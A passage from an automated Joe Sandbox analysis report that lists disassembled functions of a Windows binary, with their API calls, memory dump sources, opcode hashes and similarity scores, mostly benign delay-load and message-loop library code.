                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                                              • Instruction ID: 3a77290258bc5762b9eab8a0f5db47200be7141a18f101d8e4fe033bae5603b3
                                                                                              • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                                              • Instruction Fuzzy Hash: 8ED0C7306142197ADF436B61AC02A7EB7999B10344F008135BA4599191EBB1D9605655
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F747 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 0032F76F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: 183b61553dabad205207e339e741dcb296d1ab169d44f1ab85bae26b090f8b99
                                                                                              • Instruction ID: 9a6e6a1bbe203ff4e0bfe7a92215e8cb98b529cdf9a653c6ea22897fa2249a68
                                                                                              • Opcode Fuzzy Hash: 183b61553dabad205207e339e741dcb296d1ab169d44f1ab85bae26b090f8b99
                                                                                              • Instruction Fuzzy Hash: 9CD012345482349DC233EB3CFC5675522B8F30D78CF500631F54989191C77455C0A612
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032EEBD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00322E88), ref: 0032EEE2
                                                                                                • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
                                                                                                • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
                                                                                                • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
                                                                                                • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
                                                                                                • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: cd68988fbace2e510b805655e4d3af6ef0f3c317f651e4b8a6879f28e727e4ca
                                                                                              • Instruction ID: e6e3cd85d1064244d313bb9381b3786116197b2af27fafcd1e7b6a9ba870347d
                                                                                              • Opcode Fuzzy Hash: cd68988fbace2e510b805655e4d3af6ef0f3c317f651e4b8a6879f28e727e4ca
                                                                                              • Instruction Fuzzy Hash: DBD09E71154700AED6132B51DE06F1E7AE6BF98B09F004554B249340B1C6A29D21AF02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00320534 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4d4a6a22971671d7350263a7e4c19b17d0e9a4505c58d908d1f7ef80f7879bde
                                                                                              • Instruction ID: 506ea4687d97b37f3c0d61860a2878ad3455acb06df45a27658228ac402b5364
                                                                                              • Opcode Fuzzy Hash: 4d4a6a22971671d7350263a7e4c19b17d0e9a4505c58d908d1f7ef80f7879bde
                                                                                              • Instruction Fuzzy Hash: 77D0CA70414221CFD3A68F39E808782BBE4AF09310B22883E90C9C2220E6709880CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,0031AA1E), ref: 0031AB28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 02cf88980024112d1e553293e942678cd96a1a4c9dba321bf895609bde0bdb8e
                                                                                              • Instruction ID: 5a84563e77dbd9ba78c0667148085b8b6b48e7c4b9a004043dd04c4de71ae706
                                                                                              • Opcode Fuzzy Hash: 02cf88980024112d1e553293e942678cd96a1a4c9dba321bf895609bde0bdb8e
                                                                                              • Instruction Fuzzy Hash: BFC01234009545854E370A3498440D57623AA5A3677B5D396C065C90A1C3229CD3E502
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F32B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6cf67656b82d50e3d0e09cf7e523ef2dcf558c14bf045e05326852a9d2262e74
                                                                                              • Instruction ID: 95c4827eb0145d612d68c782011107eeb7b466612c9ec7b0dc1d726238fb9b88
                                                                                              • Opcode Fuzzy Hash: 6cf67656b82d50e3d0e09cf7e523ef2dcf558c14bf045e05326852a9d2262e74
                                                                                              • Instruction Fuzzy Hash: 86B012AA2680137E365B91103C27D7603BCC0D0B21370803FF000C8040E4842C412071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F378 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 49fe78dca8280ef0227d8a2d58987d426e98e69fe849c561575dc42ca94710d8
                                                                                              • Instruction ID: 2aee8b2f9d596bbb2e802f40d742a07564379db33cea95690b93e304c6f534ca
                                                                                              • Opcode Fuzzy Hash: 49fe78dca8280ef0227d8a2d58987d426e98e69fe849c561575dc42ca94710d8
                                                                                              • Instruction Fuzzy Hash: 1BB012AE2691127D368BD1143C23F3703BCC0C0B11374803FF004C8140D8801C411271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F364 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5abc12c0f4b4350f39873a69e87ad332c56933c394f52c466d4e0fbe40597455
                                                                                              • Instruction ID: c32be33d977e547fae81141a20c9ffc4dae945e7e372a3eed85c0e75d9568028
                                                                                              • Opcode Fuzzy Hash: 5abc12c0f4b4350f39873a69e87ad332c56933c394f52c466d4e0fbe40597455
                                                                                              • Instruction Fuzzy Hash: D5B012AE269212BD3ACBD1143C23F3702FCC0C0B11334813FF004C8540D8801C815171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F350 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8b8fb39863b15f2b1adb8bba00750fce94e839db77b2cad84ffed5499fc3c11c
                                                                                              • Instruction ID: fdd9838e24c4a07c3651a93f4477bd82b7423ffa445300c7c00b1d8954db061c
                                                                                              • Opcode Fuzzy Hash: 8b8fb39863b15f2b1adb8bba00750fce94e839db77b2cad84ffed5499fc3c11c
                                                                                              • Instruction Fuzzy Hash: B9B012AA2781127D368BD1187C23E3603BCC0C0B11370853FF004C8140D4801C411571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F35A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4036eeb6e0b2822f02374a1bee380231935300b07db223e3396365020d727bac
                                                                                              • Instruction ID: 4716c852a0b53262dc6379dc3312402f7ebfb608dcdfa247053e7d5548030401
                                                                                              • Opcode Fuzzy Hash: 4036eeb6e0b2822f02374a1bee380231935300b07db223e3396365020d727bac
                                                                                              • Instruction Fuzzy Hash: 86B012AE2691127D368BD1143C23F3B02BCC0C0B15334C03FF404C8140D8801C415171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F346 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d92e6c928f10c07499befc42c89f119fba1bace7652545e52324b059806f3cfa
                                                                                              • Instruction ID: 6761ae8ec63c8b00dad043c5d9bd458800cfe8ef7b951eb957df168e4564f71d
                                                                                              • Opcode Fuzzy Hash: d92e6c928f10c07499befc42c89f119fba1bace7652545e52324b059806f3cfa
                                                                                              • Instruction Fuzzy Hash: 56B012AA6680127D368BD1187D23E3602BCC0C0B11370863FF004CC140D4C01C421171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2e06dc966cf534aacd8465ca91c36cf88f41affb53dfc03aa5c119abfd859e07
                                                                                              • Instruction ID: 38bb0bc00e60790dfc85e7c0222b0d765e379a14136107f4e5293a573263138f
                                                                                              • Opcode Fuzzy Hash: 2e06dc966cf534aacd8465ca91c36cf88f41affb53dfc03aa5c119abfd859e07
                                                                                              • Instruction Fuzzy Hash: 57B012BA6680127D368BD1143D23E3602BCC0C0B12330803FF004CC140D4C01D425171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a9e45577f8c01a2ad1678032b77c5b104924a1ca8f6e514a7d394d9793c4bd9a
                                                                                              • Instruction ID: 4666e798a392428f6303209490133ed972212e62a38b347b4b548e3cffce44ad
                                                                                              • Opcode Fuzzy Hash: a9e45577f8c01a2ad1678032b77c5b104924a1ca8f6e514a7d394d9793c4bd9a
                                                                                              • Instruction Fuzzy Hash: 73B012AA2680127D368BD1543C23E3603BCC0C0B11370C43FF004C8340E4801C451171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2f2696418cbd62fe980a867def3fc36c0a7b5b9443795ef6582a14f4c24c86a9
                                                                                              • Instruction ID: fb8d13243de9f7053df92daf2f630049395785863f98a1c4170fb6298db64d54
                                                                                              • Opcode Fuzzy Hash: 2f2696418cbd62fe980a867def3fc36c0a7b5b9443795ef6582a14f4c24c86a9
                                                                                              • Instruction Fuzzy Hash: 07B012BA2680127D368BD1143C23E3A02BCC0C0B16330C03FF404C8140D4801C419171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F396 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 561c4384ab7a49c1f7169110bf6f88ddfdbe2a0e149a778ae0f763a903d8fa85
                                                                                              • Instruction ID: 74d09c9b00d21819928e9002b924346c8594e22053c4b7dc2a30980380850710
                                                                                              • Opcode Fuzzy Hash: 561c4384ab7a49c1f7169110bf6f88ddfdbe2a0e149a778ae0f763a903d8fa85
